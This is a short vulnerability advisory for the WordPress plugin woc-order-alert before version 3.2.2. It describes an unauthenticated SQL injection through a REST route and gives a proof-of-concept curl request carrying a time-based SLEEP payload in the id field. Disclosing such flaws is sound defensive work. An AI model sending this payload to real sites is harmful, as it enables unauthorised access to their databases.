The plugin does not sanitise and escape the id parameter before using it in a SQL statement via a REST route available to unauthenticated users, leading to an SQL injection
curl ‘http://example.com/?rest_route=/olistener/new’ --data ‘{“id”:" (SELECT SLEEP(3))#"}’ -H ‘content-type: application/json’
CPE | Name | Operator | Version |
---|---|---|---|
woc-order-alert | lt | 3.2.2 |